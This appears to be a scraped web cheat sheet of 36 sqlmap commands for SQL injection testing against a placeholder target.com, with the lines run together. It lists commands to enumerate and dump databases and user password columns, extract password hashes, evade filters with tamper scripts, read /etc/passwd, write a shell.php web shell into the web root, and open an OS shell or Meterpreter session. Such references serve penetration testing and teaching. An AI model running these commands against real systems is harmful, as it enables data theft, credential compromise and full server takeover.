$loading...
Complete sqlmap reference for SQL injection enumeration, data extraction, file read/write, and OS shell access across all major databases. (36 payloads)
sqlmap -u "http://target.com/page?id=1" --dbssqlmap -u "http://target.com/page?id=1" -D dbname --tablessqlmap -u "http://target.com/page?id=1" -D dbname -T tablename --columnssqlmap -u "http://target.com/page?id=1" -D dbname -T tablename --dumpsqlmap -u "http://target.com/page?id=1" -D dbname -T users -C username,password --dumpsqlmap -u "http://target.com/page?id=1" --current-db --current-usersqlmap -u "http://target.com/page?id=1" --passwordssqlmap -u "http://target.com/login" --data="user=admin&pass=test" -p usersqlmap -r request.txtsqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123"sqlmap -u "http://target.com/page?id=1" -H "Authorization: Bearer eyJ..."sqlmap -u "http://target.com/page?id=1*"sqlmap -u "http://target.com/page?id=1" --proxy="http://127.0.0.1:8080"sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3sqlmap -u "http://target.com/page?id=1" --technique=UNIONsqlmap -u "http://target.com/page?id=1" --technique=Bsqlmap -u "http://target.com/page?id=1" --technique=Tsqlmap -u "http://target.com/page?id=1" --dbms=mysqlsqlmap -u "http://target.com/page?id=1" --string="Welcome"sqlmap -u "URL" --tamper=space2commentsqlmap -u "URL" --tamper=randomcasesqlmap -u "URL" --tamper=betweensqlmap -u "URL" --tamper=charencodesqlmap -u "URL" --tamper=space2dashsqlmap -u "URL" --tamper=space2comment,randomcase,betweensqlmap -u "URL" --file-read="/etc/passwd"sqlmap -u "URL" --file-write=shell.php --file-dest=/var/www/html/shell.phpsqlmap -u "URL" --os-shellsqlmap -u "URL" --os-cmd="id"sqlmap -u "URL" --os-pwnsqlmap -u "URL" --batchsqlmap -u "URL" --dump-all --exclude-sysdbssqlmap -u "URL" --threads=10sqlmap -u "URL" --formssqlmap -u "URL" --crawl=3sqlmap -u "URL" --output-dir=/tmp/sqlmap_resultsLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides